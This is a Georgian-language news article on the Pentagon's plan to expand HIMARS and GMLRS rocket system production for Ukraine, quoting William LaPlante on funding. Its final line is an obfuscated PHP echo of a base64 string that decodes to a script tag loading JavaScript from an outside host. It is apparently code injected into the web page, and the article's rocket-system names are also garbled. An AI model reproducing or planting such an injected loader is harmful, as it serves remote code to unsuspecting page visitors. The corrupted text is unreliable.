celsiusi
ავერსი საქკაბელი
პენტაგონის განცხადებით, უკრაინის დასახმარებლად აშშ „ჰაიმარსის“ ტიპის სარაკეტო სისტემების წარმოების გაზრდას გეგმავს. ამის შესახებ ინფორმაციას აშშ-ის თავდაცვის დეპარტამენტი ავრცელებს.
 
აშშ-ის თავდაცვის დეპარტამენტის ცნობით, თავდაცვის მდივნის მოადგილე უილიამ ლაპლანტმა დაათვალიერა HIMAღშ​-ის და GMLღშ-ის ტიპის სარაკეტო სისტემების მწარმოებელი ქარხანა.
 
„მაშინ, როცა ვაგრძელებთ უკრაინისთვის უსაფრთხოების დახმარების აღმოჩენას, ვმუშაობთ ინდუსტრიასთან, რათა დავაჩქაროთ კრიტიკული იარაღისა და სისტემების წარმოება. ეს მოიცავს დაფინანსებას მეტი აღჭურვილობის შესაძენად, პროდუქციის ხაზების გაფართოებისთვის და დამატებითი პერსონალის დაქირავებისა და სამუშაო ძალის განვითარების ხელშეწყობისთვის“, – განაცხადა ლაპლანტმა.
 
ინდუსტრიასთან პარტნიორობის გაძლიერების შესაძლებლობისთვის, ლაპლანტმა ხაზი გაუსვა წარმოების რთული მოთხოვნებისა და მოძველების საკითხების გადაჭრას, ასევე კონტრაქტების პროცესების დაჩქარებას.
 
„ჩვენ მივიღეთ დაახლოებით 400 მილიონი დოლარი, პენტაგონის საწყობებში HIMAღშ და GMLღშ რაოდენობის აღსადგენად. გარდა ამისა, დაახლოებით 200 მილიონი დოლარი გამოიყოფა წარმოების გაფართოებისა და დაჩქარებისთვის“, – განაცხადა ლაპლანტმა.
 
როგორც პენტაგონი იუწყება, თავდაცვის მდივნის მოადგილის ვიზიტი სარაკეტო სისტემების მწარმოებელ ქარხანაში მოჰყვა ქვეყნის პრეზიდენტ ჯო ბაიდენის მიერ უკრაინისთვის 3 მილიარდის ოდენობის სამხედრო დახმარების გამოყოფის შესახებ განცხადებას.
 
„ჩვენ გავაგრძელებთ მჭიდრო კონსულტაციებს უკრაინასთან საჭიროებებზე და როგორც პრეზიდენტმა ბაიდენმა თქვა, ჩვენი მიზანი უბრალოა: ამერიკის შეერთებულ შტატებს სურს, ნახოს დემოკრატიული, დამოუკიდებელი, სუვერენული და აყვავებული უკრაინა, შემდგომი აგრესიის შეკავებისა და თავის დაცვის შესაძლებლობებით, რომელსაც აქვს საშუალება, შეაკავოს და დაიცვას თავი შემდგომი აგრესიისგან“, – განაცხადა ლაპლანტმა.
503
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");